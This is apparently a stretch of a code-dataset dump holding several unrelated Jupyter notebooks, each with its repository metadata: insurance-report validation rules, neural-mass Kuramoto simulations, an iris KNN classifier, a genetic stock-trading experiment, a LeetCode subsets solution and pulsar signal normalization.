5/5 [00:00<00:00, 499.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 8/8 [00:00<00:00, 470.48it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 8/8 [00:00<00:00, 533.22it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 499.87it/s]\n"
]
],
[
[
"Print results for the first table (if there are rules for tables with an open axis)",
"_____no_output_____"
]
],
[
[
"if len(output_open_axis.keys()) > 0:\n display(output_open_axis[list(output_open_axis.keys())[0]]['results'].head())",
"_____no_output_____"
]
],
[
[
"## 6. Save results",
"_____no_output_____"
],
[
"### Combine results for closed- and open-axis tables",
"_____no_output_____"
],
[
"To output the results in a single file, we want to combine the results for closed-axis and open-axis tables",
"_____no_output_____"
]
],
[
[
"# Function to transform results for open-axis tables, so it can be appended to results for closed-axis tables\n# The 'extra' index columns are converted to data columns\ndef transform_results_open_axis(df):\n if df.index.nlevels > 2:\n reset_index_levels = list(range(2, df.index.nlevels))\n df = df.reset_index(level=reset_index_levels)\n rename_columns={}\n for x in reset_index_levels:\n rename_columns['level_' + str(x)] = 'id_column_' + str(x - 1)\n df.rename(columns=rename_columns, inplace=True)\n return df",
"_____no_output_____"
],
[
"df_results = df_results_closed_axis.copy() # results for closed axis tables\nfor table in list(output_open_axis.keys()): # for all open axis tables with rules -> append and sort results\n df_results = transform_results_open_axis(output_open_axis[table]['results']).append(df_results, sort=False).sort_values(by=['pattern_id']).sort_index()",
"_____no_output_____"
]
],
[
[
"Change column order so the dataframe starts with the identifying columns:",
"_____no_output_____"
]
],
[
[
"list_col_order = []\nfor i in range(1, len([col for col in list(df_results.columns) if col[:10] == 'id_column_']) + 1):\n list_col_order.append('id_column_' + str(i))\nlist_col_order.extend(col for col in list(df_results.columns) if col not in list_col_order)\ndf_results = df_results[list_col_order]\ndf_results.head()",
"_____no_output_____"
]
],
[
[
"### Save results",
"_____no_output_____"
],
[
"The dataframe df_results contains all output of the evaluation of the validation rules. ",
"_____no_output_____"
]
],
[
[
"# To save all results use df_results\n# To save all exceptions use df_results['result_type']==False \n# To save all confirmations use df_results['result_type']==True\n\n# Here we save only the exceptions to the validation rules\ndf_results[df_results['result_type']==False].to_excel(join(RESULTS_PATH, \"results.xlsx\"))",
"_____no_output_____"
]
],
[
[
"### Example of an error in the report",
"_____no_output_____"
]
],
[
[
"# Get the pandas code from the first pattern and evaluate it\ns = df_patterns.loc[4, 'pandas ex'].replace('df', 'df_closed_axis')\nprint('Pattern:', s)\ndisplay(eval(s)[re.findall('S.\\d\\d.\\d\\d.\\d\\d.\\d\\d,R\\d\\d\\d\\d,C\\d\\d\\d\\d',s)])",
"Pattern: df_closed_axis[~(df_closed_axis['S.01.02.01.01,R0100,C0010']=='REGULAR REPORTING')]\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb523ec409298f4c063e431d07919bd50b71dd59 | 3,965 | ipynb | Jupyter Notebook | connectivity/connectivity_dynamics.ipynb | vagechirkov/NI-project | fa0687d81ffad9b2e3737fe9115a151335bda358 | [
"MIT"
] | 1 | 2021-06-01T08:06:15.000Z | 2021-06-01T08:06:15.000Z | connectivity/connectivity_dynamics.ipynb | vagechirkov/NI-project | fa0687d81ffad9b2e3737fe9115a151335bda358 | [
"MIT"
] | null | null | null | connectivity/connectivity_dynamics.ipynb | vagechirkov/NI-project | fa0687d81ffad9b2e3737fe9115a151335bda358 | [
"MIT"
] | null | null | null | 23.052326 | 100 | 0.547037 | [
[
[
"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport scipy\n\n# NB: add more subjects in the data folder in neurolib package\nfrom neurolib.utils.loadData import Dataset\nfrom neurolib.models.aln import ALNModel\n\nfrom coonectivity_dynamics import (plot_kuramoto_example, kuramoto,\n fast_kuramoto)\nplt.style.use('seaborn')\nsns.set_style(\"whitegrid\")\nsns.set_context(\"talk\")",
"_____no_output_____"
],
[
"ds = Dataset(\"gw\")\nmodel = ALNModel(Cmat=ds.Cmats[26], Dmat=ds.Dmats[26])\nmodel.params['dt'] = 0.1\nmodel.params['duration'] = 20 * 1000 # ms\n\n# add custom parameter for downsampling results\n# 10 ms sampling steps for saving data, should be multiple of dt\nmodel.params['save_dt'] = 10.0\nmodel.params[\"tauA\"] = 600.0\nmodel.params[\"sigma_ou\"] = 0.0\nmodel.params[\"b\"] = 20.0\n\nmodel.params[\"Ke_gl\"] = 300.0\nmodel.params[\"signalV\"] = 80.0\nmodel.params[\"mue_ext_mean\"] = 1.5\nmodel.params[\"mui_ext_mean\"] = 0.2\n",
"_____no_output_____"
],
[
"model.run()",
"_____no_output_____"
],
[
"model.default_output",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 6))\nplt.imshow(model.rates_exc[:, :10000], aspect='auto') # Aspect=1.2",
"_____no_output_____"
],
[
"plot_kuramoto_example(model.rates_exc[:4, 5000:15_000])",
"_____no_output_____"
]
],
[
[
"### Check the time profile of the kuramoto estimation function",
"_____no_output_____"
]
],
[
[
"from line_profiler import LineProfiler\nlp = LineProfiler()\nlp_wrapper = lp(kuramoto)\nkur = lp_wrapper(model.rates_exc[::10])\nlp.print_stats()",
"_____no_output_____"
],
[
"%%time\nkur1 = fast_kuramoto(model.rates_exc[::10][:, :10_000])\n",
"_____no_output_____"
],
[
"%%time\nkur2 = kuramoto(model.rates_exc[::10][:, :10_000])",
"_____no_output_____"
],
[
"np.corrcoef(kur1, kur2)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb52522b324d32157def332809616cb35ddcb4d5 | 3,808 | ipynb | Jupyter Notebook | codecheatsheet/a_basic_sample.ipynb | currypan/tb4 | 1f5206927205c5e9e83762c973680aa30194a357 | [
"MIT"
] | 6 | 2018-03-12T12:54:48.000Z | 2018-10-07T10:49:59.000Z | codecheatsheet/a_basic_sample.ipynb | currypan/tb4 | 1f5206927205c5e9e83762c973680aa30194a357 | [
"MIT"
] | 2 | 2018-03-24T12:27:29.000Z | 2018-03-24T14:44:50.000Z | codecheatsheet/a_basic_sample.ipynb | currypan/tb4 | 1f5206927205c5e9e83762c973680aa30194a357 | [
"MIT"
] | 2 | 2018-03-24T08:07:46.000Z | 2018-04-10T02:01:40.000Z | 19.04 | 174 | 0.501576 | [
[
[
"from sklearn import neighbors, datasets, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score",
"_____no_output_____"
],
[
"iris = datasets.load_iris()\nX, y = iris.data[:, :2], iris.target",
"_____no_output_____"
],
[
"print(X.shape)\nprint(y.shape)",
"(150, 2)\n(150,)\n"
],
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=33)",
"_____no_output_____"
],
[
"print(X_train.shape)\nprint(X_test.shape)\nprint(y_train.shape)\nprint(y_test.shape)",
"(112, 2)\n(38, 2)\n(112,)\n(38,)\n"
],
[
"print(X_train[0])\nprint(X_test[0])",
"[ 5. 2.3]\n[ 5.7 2.9]\n"
],
[
"scaler = preprocessing.StandardScaler().fit(X_train)",
"_____no_output_____"
],
[
"X_train = scaler.transform(X_train)\nX_test = scaler.transform(X_test)",
"_____no_output_____"
],
[
"print(X_train[0])\nprint(X_test[0])",
"[-0.91090798 -1.59761476]\n[-0.09752318 -0.32858743]\n"
],
[
"knn = neighbors.KNeighborsClassifier(n_neighbors=5)\nknn.fit(X_train, y_train)",
"_____no_output_____"
],
[
"y_pred = knn.predict(X_test)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5253e6ed3c2fbeeb114f546198c156d662ca6f | 992,479 | ipynb | Jupyter Notebook | notebooks/nbk03_trader_test01_all.ipynb | dwelcaslu/I2A2-FM-Naive-Trader | 1b1ea576d493a55c0363ec3f639b8b328e03cd87 | [
"MIT"
] | null | null | null | notebooks/nbk03_trader_test01_all.ipynb | dwelcaslu/I2A2-FM-Naive-Trader | 1b1ea576d493a55c0363ec3f639b8b328e03cd87 | [
"MIT"
] | null | null | null | notebooks/nbk03_trader_test01_all.ipynb | dwelcaslu/I2A2-FM-Naive-Trader | 1b1ea576d493a55c0363ec3f639b8b328e03cd87 | [
"MIT"
] | null | null | null | 420.72022 | 227,416 | 0.917464 | [
[
[
"import os, sys\nsys.path.append('../src/')\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\n\nfrom sklearn.naive_bayes import GaussianNB\n\n# https://technical-analysis-library-in-python.readthedocs.io/en/latest/ta.html#trend-indicators\nimport ta\n\nimport indicators as ind\nimport arena as arn\nimport stockmarket as smkt",
"_____no_output_____"
],
[
"stock_data = pd.read_excel('../data/indicadores petrobras.xlsx')\nstock_data.index = stock_data['Data'].values\nstock_data = stock_data.sort_index()\nstock_data",
"_____no_output_____"
],
[
"# Calculating the stock market indicators:\nstock_data = ind.stock_preprocessing(stock_data)\nstock_data",
"_____no_output_____"
]
],
[
[
"# Data Preparation:",
"_____no_output_____"
]
],
[
[
"FEATURES_NAMES = ['macd', 'signal', 'histogram', 'williams_r']",
"_____no_output_____"
],
[
"data_train = stock_data[0:501].dropna()\ndata_train",
"_____no_output_____"
],
[
"data_test = stock_data[501:]\ndata_test",
"_____no_output_____"
],
[
"X_train = data_train[FEATURES_NAMES]\nX_train",
"_____no_output_____"
],
[
"X_test = data_test[FEATURES_NAMES]\nX_test",
"_____no_output_____"
]
],
[
[
"# Trading arena:",
"_____no_output_____"
]
],
[
[
"params = {'estimator': GaussianNB(),\n 'features_names': FEATURES_NAMES,\n 'initial_cash': data_train['Fech.'].values[0]*100,\n 'initial_stocks': 0,\n 'daily_negotiable_perc': 0.5,\n 'min_stocks_op': 1,\n 'broker_taxes': 0,\n }\narena = arn.TraderArena(target_names=[0, 1, 2], n_gens=1000, init_population=1000, n_mutations=100, train_size=0.6)\ngnb = arena.run(data_train, params)",
"Initial wealth: 661.0\nGeneration 1: train wealth 1491.87 valid wealth 1054.67\nGeneration 2: train wealth 1424.31 valid wealth 1063.26\nGeneration 3: train wealth 1398.12 valid wealth 1084.82\nGeneration 4: train wealth 1492.68 valid wealth 1097.53\nGeneration 5: train wealth 1387.59 valid wealth 1097.53\nGeneration 6: train wealth 1323.24 valid wealth 1097.53\nGeneration 7: train wealth 1348.44 valid wealth 1097.53\nGeneration 8: train wealth 1312.17 valid wealth 1129.24\nGeneration 9: train wealth 1293.89 valid wealth 1129.24\nGeneration 10: train wealth 1421.65 valid wealth 1135.73\nGeneration 11: train wealth 1371.58 valid wealth 1135.73\nGeneration 12: train wealth 1358.15 valid wealth 1143.23\nGeneration 13: train wealth 1431.98 valid wealth 1171.54\nGeneration 14: train wealth 1451.82 valid wealth 1171.54\nGeneration 15: train wealth 1409.63 valid wealth 1171.54\nGeneration 16: train wealth 1385.93 valid wealth 1171.54\nGeneration 17: train wealth 1436.34 valid wealth 1171.54\nGeneration 18: train wealth 1378.7 valid wealth 1171.54\nGeneration 19: train wealth 1339.36 valid wealth 1171.54\nGeneration 20: train wealth 1546.15 valid wealth 1171.54\nGeneration 21: train wealth 1350.43 valid wealth 1171.54\nGeneration 22: train wealth 1417.81 valid wealth 1171.54\nGeneration 23: train wealth 1488.41 valid wealth 1171.54\nGeneration 24: train wealth 1567.17 valid wealth 1171.54\nGeneration 25: train wealth 1365.66 valid wealth 1171.54\nGeneration 26: train wealth 1493.82 valid wealth 1171.54\nGeneration 27: train wealth 1659.64 valid wealth 1171.54\nGeneration 28: train wealth 1447.05 valid wealth 1171.54\nGeneration 29: train wealth 1355.59 valid wealth 1171.54\nGeneration 30: train wealth 1450.7 valid wealth 1171.54\nGeneration 31: train wealth 1421.55 valid wealth 1171.54\nGeneration 32: train wealth 1327.38 valid wealth 1180.23\nGeneration 33: train wealth 1380.62 valid wealth 1180.23\nGeneration 34: train wealth 1536.93 valid wealth 1180.23\nGeneration 35: train wealth 1382.83 valid wealth 1180.23\nGeneration 36: train wealth 1592.12 valid wealth 1180.23\nGeneration 37: train wealth 1386.96 valid wealth 1180.23\nGeneration 38: train wealth 1352.5 valid wealth 1192.3\nGeneration 39: train wealth 1391.37 valid wealth 1194.24\nGeneration 40: train wealth 1551.59 valid wealth 1194.24\nGeneration 41: train wealth 1368.88 valid wealth 1194.24\nGeneration 42: train wealth 1346.6 valid wealth 1194.24\nGeneration 43: train wealth 1364.84 valid wealth 1194.24\nGeneration 44: train wealth 1388.22 valid wealth 1194.24\nGeneration 45: train wealth 1378.74 valid wealth 1194.24\nGeneration 46: train wealth 1412.18 valid wealth 1194.24\nGeneration 47: train wealth 1296.67 valid wealth 1194.24\nGeneration 48: train wealth 1346.28 valid wealth 1194.24\nGeneration 49: train wealth 1319.36 valid wealth 1194.24\nGeneration 50: train wealth 1263.74 valid wealth 1194.24\nGeneration 51: train wealth 1347.74 valid wealth 1194.24\nGeneration 52: train wealth 1430.74 valid wealth 1194.24\nGeneration 53: train wealth 1345.12 valid wealth 1194.24\nGeneration 54: train wealth 1345.02 valid wealth 1194.24\nGeneration 55: train wealth 1350.36 valid wealth 1194.24\nGeneration 56: train wealth 1326.29 valid wealth 1194.24\nGeneration 57: train wealth 1326.08 valid wealth 1194.24\nGeneration 58: train wealth 1430.41 valid wealth 1194.24\nGeneration 59: train wealth 1527.52 valid wealth 1194.24\nGeneration 60: train wealth 1401.26 valid wealth 1194.24\nGeneration 61: train wealth 1355.65 valid wealth 1194.24\nGeneration 62: train wealth 1544.25 valid wealth 1194.24\nGeneration 63: train wealth 1369.98 valid wealth 1194.24\nGeneration 64: train wealth 1390.66 valid wealth 1194.24\nGeneration 65: train wealth 1492.7 valid wealth 1194.24\nGeneration 66: train wealth 1372.71 valid wealth 1194.24\nGeneration 67: train wealth 1389.43 valid wealth 1194.24\nGeneration 68: train wealth 1398.7 valid wealth 1194.24\nGeneration 69: train wealth 1517.23 valid wealth 1194.24\nGeneration 70: train wealth 1440.24 valid wealth 1194.24\nGeneration 71: train wealth 1528.6 valid wealth 1194.24\nGeneration 72: train wealth 1439.49 valid wealth 1194.24\nGeneration 73: train wealth 1237.44 valid wealth 1194.24\nGeneration 74: train wealth 1310.29 valid wealth 1194.24\nGeneration 75: train wealth 1408.8 valid wealth 1194.24\nGeneration 76: train wealth 1294.07 valid wealth 1194.24\nGeneration 77: train wealth 1196.97 valid wealth 1194.24\nGeneration 78: train wealth 1439.9 valid wealth 1194.24\nGeneration 79: train wealth 1274.1 valid wealth 1194.24\nGeneration 80: train wealth 1359.71 valid wealth 1194.24\nGeneration 81: train wealth 1582.62 valid wealth 1194.24\nGeneration 82: train wealth 1403.61 valid wealth 1194.24\nGeneration 83: train wealth 1549.4 valid wealth 1194.24\nGeneration 84: train wealth 1294.1 valid wealth 1194.24\nGeneration 85: train wealth 1301.12 valid wealth 1194.24\nGeneration 86: train wealth 1305.06 valid wealth 1194.24\nGeneration 87: train wealth 1388.88 valid wealth 1207.32\nGeneration 88: train wealth 1461.17 valid wealth 1207.32\nGeneration 89: train wealth 1382.65 valid wealth 1207.32\nGeneration 90: train wealth 1457.49 valid wealth 1207.32\nGeneration 91: train wealth 1446.61 valid wealth 1207.32\nGeneration 92: train wealth 1345.02 valid wealth 1207.32\nGeneration 93: train wealth 1300.37 valid wealth 1207.32\nGeneration 94: train wealth 1254.9 valid wealth 1207.32\nGeneration 95: train wealth 1442.24 valid wealth 1207.32\nGeneration 96: train wealth 1586.78 valid wealth 1207.32\nGeneration 97: train wealth 1382.81 valid wealth 1207.32\nGeneration 98: train wealth 1469.61 valid wealth 1207.32\nGeneration 99: train wealth 1376.04 valid wealth 1207.32\nGeneration 100: train wealth 1503.63 valid wealth 1207.32\nGeneration 101: train wealth 1387.05 valid wealth 1207.32\nGeneration 102: train wealth 1229.18 valid wealth 1207.32\nGeneration 103: train wealth 1380.68 valid wealth 1207.32\nGeneration 104: train wealth 1450.77 valid wealth 1207.32\nGeneration 105: train wealth 1340.86 valid wealth 1207.32\nGeneration 106: train wealth 1360.11 valid wealth 1207.32\nGeneration 107: train wealth 1306.26 valid wealth 1207.32\nGeneration 108: train wealth 1451.48 valid wealth 1207.32\nGeneration 109: train wealth 1416.86 valid wealth 1207.32\nGeneration 110: train wealth 1320.16 valid wealth 1207.32\nGeneration 111: train wealth 1368.66 valid wealth 1207.32\nGeneration 112: train wealth 1608.56 valid wealth 1207.32\nGeneration 113: train wealth 1363.67 valid wealth 1207.32\nGeneration 114: train wealth 1324.56 valid wealth 1207.32\nGeneration 115: train wealth 1455.69 valid wealth 1207.32\nGeneration 116: train wealth 1320.25 valid wealth 1207.32\nGeneration 117: train wealth 1448.23 valid wealth 1207.32\nGeneration 118: train wealth 1398.66 valid wealth 1207.32\nGeneration 119: train wealth 1327.93 valid wealth 1207.32\nGeneration 120: train wealth 1417.09 valid wealth 1207.32\nGeneration 121: train wealth 1314.96 valid wealth 1207.32\nGeneration 122: train wealth 1329.87 valid wealth 1207.32\nGeneration 123: train wealth 1376.82 valid wealth 1207.32\nGeneration 124: train wealth 1292.69 valid wealth 1207.32\nGeneration 125: train wealth 1367.34 valid wealth 1207.32\nGeneration 126: train wealth 1423.9 valid wealth 1207.32\nGeneration 127: train wealth 1350.26 valid wealth 1207.32\nGeneration 128: train wealth 1440.0 valid wealth 1207.32\nGeneration 129: train wealth 1583.13 valid wealth 1207.32\nGeneration 130: train wealth 1441.89 valid wealth 1207.32\nGeneration 131: train wealth 1358.29 valid wealth 1207.32\nGeneration 132: train wealth 1352.33 valid wealth 1207.32\nGeneration 133: train wealth 1294.62 valid wealth 1207.32\nGeneration 134: train wealth 1495.83 valid wealth 1207.32\nGeneration 135: train wealth 1464.7 valid wealth 1207.32\nGeneration 136: train wealth 1355.3 valid wealth 1207.32\nGeneration 137: train wealth 1400.06 valid wealth 1207.32\nGeneration 138: train wealth 1614.98 valid wealth 1207.32\nGeneration 139: train wealth 1383.85 valid wealth 1207.32\nGeneration 140: train wealth 1396.68 valid wealth 1207.32\nGeneration 141: train wealth 1399.94 valid wealth 1207.32\nGeneration 142: train wealth 1408.49 valid wealth 1207.32\nGeneration 143: train wealth 1495.03 valid wealth 1207.32\nGeneration 144: train wealth 1370.84 valid wealth 1207.32\nGeneration 145: train wealth 1367.24 valid wealth 1207.32\nGeneration 146: train wealth 1434.91 valid wealth 1207.32\nGeneration 147: train wealth 1402.67 valid wealth 1207.32\nGeneration 148: train wealth 1407.3 valid wealth 1207.32\nGeneration 149: train wealth 1312.79 valid wealth 1207.32\nGeneration 150: train wealth 1355.74 valid wealth 1207.32\nGeneration 151: train wealth 1336.19 valid wealth 1207.32\nGeneration 152: train wealth 1493.2 valid wealth 1207.32\nGeneration 153: train wealth 1325.03 valid wealth 1207.32\nGeneration 154: train wealth 1502.21 valid wealth 1207.32\nGeneration 155: train wealth 1498.67 valid wealth 1207.32\nGeneration 156: train wealth 1487.19 valid wealth 1207.32\nGeneration 157: train wealth 1282.43 valid wealth 1207.32\nGeneration 158: train wealth 1526.26 valid wealth 1207.32\nGeneration 159: train wealth 1402.07 valid wealth 1207.32\nGeneration 160: train wealth 1418.83 valid wealth 1207.32\nGeneration 161: train wealth 1455.69 valid wealth 1207.32\nGeneration 162: train wealth 1347.65 valid wealth 1207.32\nGeneration 163: train wealth 1434.79 valid wealth 1207.32\nGeneration 164: train wealth 1342.29 valid wealth 1207.32\nGeneration 165: train wealth 1355.88 valid wealth 1207.32\nGeneration 166: train wealth 1603.97 valid wealth 1207.32\nGeneration 167: train wealth 1481.14 valid wealth 1207.32\nGeneration 168: train wealth 1396.86 valid wealth 1207.32\nGeneration 169: train wealth 1381.95 valid wealth 1207.32\nGeneration 170: train wealth 1434.19 valid wealth 1207.32\nGeneration 171: train wealth 1516.17 valid wealth 1207.32\nGeneration 172: train wealth 1349.15 valid wealth 1207.32\nGeneration 173: train wealth 1555.36 valid wealth 1207.32\nGeneration 174: train wealth 1354.1 valid wealth 1207.32\nGeneration 175: train wealth 1335.0 valid wealth 1207.32\nGeneration 176: train wealth 1363.72 valid wealth 1207.32\nGeneration 177: train wealth 1463.06 valid wealth 1207.32\nGeneration 178: train wealth 1375.97 valid wealth 1207.32\nGeneration 179: train wealth 1502.21 valid wealth 1207.32\nGeneration 180: train wealth 1301.58 valid wealth 1207.32\nGeneration 181: train wealth 1407.86 valid wealth 1207.32\nGeneration 182: train wealth 1274.67 valid wealth 1207.32\nGeneration 183: train wealth 1285.94 valid wealth 1207.32\nGeneration 184: train wealth 1373.1 valid wealth 1207.32\nGeneration 185: train wealth 1485.18 valid wealth 1207.32\nGeneration 186: train wealth 1498.89 valid wealth 1207.32\nGeneration 187: train wealth 1491.59 valid wealth 1207.32\n"
],
[
"arena.plot_evolution()",
"_____no_output_____"
]
],
[
[
"# Operating in the market:",
"_____no_output_____"
]
],
[
[
"# Train:\nmkt_op_train = smkt.MarkerOperator(gnb, FEATURES_NAMES, initial_cash=data_train['Fech.'].values[0]*100)\nop_results_train = mkt_op_train.run(data_train)\nop_results_train",
"_____no_output_____"
],
[
"mkt_op_train.plot_wealth()",
"_____no_output_____"
],
[
"mkt_op_train.plot_operations()",
"_____no_output_____"
],
[
"# Test:\nmkt_op_test = smkt.MarkerOperator(gnb, FEATURES_NAMES, initial_cash=data_test['Fech.'].values[0]*100)\nop_results_test = mkt_op_test.run(data_test)\nop_results_test",
"_____no_output_____"
],
[
"mkt_op_test.plot_wealth()",
"_____no_output_____"
],
[
"mkt_op_test.plot_operations()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5256149fa8766d5bff134dfc976b31d955f24b | 1,992 | ipynb | Jupyter Notebook | 078. Subsets.ipynb | sppool/LeetCode | e1c94cacf2ecc848dfa32d8e7691c0939a896f86 | [
"MIT"
] | null | null | null | 078. Subsets.ipynb | sppool/LeetCode | e1c94cacf2ecc848dfa32d8e7691c0939a896f86 | [
"MIT"
] | null | null | null | 078. Subsets.ipynb | sppool/LeetCode | e1c94cacf2ecc848dfa32d8e7691c0939a896f86 | [
"MIT"
] | null | null | null | 20.536082 | 93 | 0.429719 | [
[
[
"### Subsets",
"_____no_output_____"
]
],
[
[
"Given a set of distinct integers, nums, return all possible subsets (the power set).\nNote: The solution set must not contain duplicate subsets.\n\nExample:\nInput: nums = [1,2,3]\nOutput:\n[ [3],\n [1],\n [2],\n [1,2,3],\n [1,3],\n [2,3],\n [1,2],\n [] ]",
"_____no_output_____"
]
],
[
[
"class Solution: # 68.37%\n def subsets(self, nums):\n if nums == []: return[[]]\n lst = [[]]\n for num in nums:\n lst = self.plus_num(lst, [[num], []])\n return lst\n\n def plus_num(self, o_lst, p_lst):\n lst = []\n for ls in o_lst:\n for ls2 in p_lst:\n lst.append(ls+ls2)\n return lst",
"_____no_output_____"
],
[
"nums = [1, 2, 3]\nans = Solution()\nans.subsets(nums)",
"_____no_output_____"
]
]
] | [
"markdown",
"raw",
"code"
] | [
[
"markdown"
],
[
"raw"
],
[
"code",
"code"
]
] |
cb5262254cd7fd1264f7bd9a5f0f07c4b3549a9a | 81,352 | ipynb | Jupyter Notebook | Work_1_ver_1.ipynb | kuunal-mahtani/CTA200kmahtani | 7e7aea448e947028f7dc5d1ba8ecaab47b2b986d | [
"MIT"
] | null | null | null | Work_1_ver_1.ipynb | kuunal-mahtani/CTA200kmahtani | 7e7aea448e947028f7dc5d1ba8ecaab47b2b986d | [
"MIT"
] | null | null | null | Work_1_ver_1.ipynb | kuunal-mahtani/CTA200kmahtani | 7e7aea448e947028f7dc5d1ba8ecaab47b2b986d | [
"MIT"
] | null | null | null | 237.177843 | 56,184 | 0.911557 | [
[
[
"import numpy as np\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"def normalize(fold_data,icount_data): #creating function for normalizing folded pulse data\n \n norm_data = np.zeros_like(fold_data) #initializing array for normalized data\n \n for i in range(len(fold_data[:,:,:])): #looping over how ever many itterations within the folded data necessary to fill norm_data\n norm_data[:,:,:,i] = fold_data[:,:,:,i]/icount_data[:,:,:] #normalizing data\n \n return norm_data",
"_____no_output_____"
],
[
"start = \"arochime-invpfbB0329+54_32768chan3ntbin\"\nfold = \"foldspec_2018-08-16T10:\"\nicount = \"icount_2018-08-16T10:\"\nend = \".000+30.000000000000004sec\"\n\n#final code will look something like:\n#need to add plotting line, need to add second for loop for strings with :00 instead of :30\n# i = 0\n# for filename in filenames:\n# fold = np.load(start+fold+str(i+38)+\":\"+str(30)+end+\".npy\")\n# count = np.load(start+icount+str(i+38)+\":\"+str(30)+end+\".npy\")\n# norm = normalize(fold,count)\n# #plotting line\n# plt.savefig(start+fold+str(i+38)+\":\"+str(30)+end+\".png\")\n# i = i+1\n \ntest = np.load(start+fold+str(38)+\":\"+str(30)+end+\".npy\")",
"_____no_output_____"
],
[
"#what metadata reads:\n #arochime - data from arochime\n #invpfb - something specific to arochime???????\n #B0329+54 - pulsar name\n #32768 - number of entries in the frequency axis\n #chan3t - ???????????\n #foldspec/icount - folded pulse signals or icount data\n #_2018_08-16 - date at which data was taken\n #T - time\n #10:38:30.00 - 10 O'clock and 38 minutes and 30 seconds\n #30.000000000000004sec - data taken over 30 second interval?????????\n #.npy - filetype\ndata1 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:38:30.000+30.000000000000004sec.npy\")\ndata2 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:38:30.000+30.000000000000004sec.npy\")\ndata3 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:39:00.000+30.000000000000004sec.npy\")\ndata4 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:39:00.000+30.000000000000004sec.npy\")",
"_____no_output_____"
],
[
"new_data = normalize(data1,data2)\n#print(new_data[0,0,:,0]) #phase x\n#print(new_data[0,:,0,0]) #freuecy y\n#plt.plot(new_data[0,0,:,0],new_data[0,:,0,0])",
"_____no_output_____"
],
[
"ndata = np.zeros_like(data2)\nndata2 = np.zeros_like(data1)\n\nfor i in range(len(data1[:,:,:])):\n ndata2[:,:,:,i] = data1[:,:,:,i]/data2[:,:,:]\n\n#print(ndata2)",
"_____no_output_____"
],
[
"#################### EVERYTHING BELOW IS SCRATCH WORK ############################",
"_____no_output_____"
],
[
"len(data1)\nprint(data1[0,:,0,0])\n#print(data1[0,0,:,0])\nprint(data1[:,0,1,0])",
"[20.894543 22.04368 23.128796 ... 35.283733 35.07841 34.861423]\n[19.661644 20.953207 16.106157]\n"
],
[
"plt.figure(figsize=(16,9))\nfor i in range(len(data1)):\n for j in range(len(data1[0,0,:,0])):\n plt.plot(data2[i,:,j],data1[i,:,j,0], 'o')\n #plt.xlim(237,240)\nplt.savefig('fig1.png')\n%time",
"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 10.3 µs\n"
],
[
"%time\n#test1 = np.zeros_like(data1)\ninterm = np.zeros_like(data1)\nfor i in range(len(data1)):\n for j in range(len(data1[0,0,:,0])):\n test1[i,:,j,0] = test1[i,:,j,0]+data1[i,:,j,0]\n #plt.xlim(237,240)",
"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 19.1 µs\n"
],
[
"%time\n#test1 = np.zeros_like(data1)\ntest_01 = np.zeros(len(data1[0,:,0,0]))\ninterm = np.zeros_like(data1)\nfor i in range(len(data1)):\n for j in range(len(data1[0,0,:,0])):\n test_01 = test_01+data1[i,:,j,0]\n #plt.xlim(237,240)",
"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 11.9 µs\n"
],
[
"plt.figure(figsize=(16,9))\nfor i in range(len(data1)):\n plt.plot(data2[i,:,0],test_01, 'o')\nplt.savefig('fig2.png')\n%time",
